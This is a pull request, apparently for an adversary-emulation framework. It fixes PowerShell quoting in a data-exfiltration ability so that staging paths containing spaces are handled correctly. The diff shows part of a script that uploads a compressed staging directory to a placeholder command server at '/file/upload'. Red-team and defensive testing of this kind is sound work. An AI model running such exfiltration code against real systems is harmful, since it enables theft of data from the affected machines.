### PR TITLE
Using double quote to allow proper powershell escaping of paths with spaces for exfil

### DIFF
--- a/data/abilities/exfiltration/ea713bc4-63f0-491c-9a6f-0b01d560b87e.yml
+++ b/data/abilities/exfiltration/ea713bc4-63f0-491c-9a6f-0b01d560b87e.yml
@@ -21,8 +21,8 @@
         # REF: https://stackoverflow.com/a/45409728
         command: |
           $ErrorActionPreference = 'Stop';
-          $fieldName = '#{host.dir.compress}';
-          $filePath = '#{host.dir.compress}';
+          $fieldName = "#{host.dir.compress}";
+          $filePath = "#{host.dir.compress}";
           $url = "#{server}/file/upload";
 
           Add-Type -AssemblyName 'System.Net.Http';
@@ -41,4 +41,3 @@
   requirements:
     - plugins.stockpile.app.requirements.paw_provenance:
       - source: host.dir.compress
-


### PR DESCRIPTION
## Description
The exfil ability `ea713bc4-63f0-491c-9a6f-0b01d560b87e` will not work properly with the powershell executor if the staging directory path has space in it and is surrounded by single quotes. The single quotes are replaced by double quotes to allow proper escaping

## Type of change
- [x] Bug fix (non-breaking change which fixes an issue)

## How Has This Been Tested?
Tested staging dir exfil with spaces in the path and confirmed that it was executed correctly

## Checklist:
- [x] My code follows the style guidelines of this project
- [x] I have performed a self-review of my own code
- [ ] I have made corresponding changes to the documentation
- [ ] I have added tests that prove my fix is effective or that my feature works
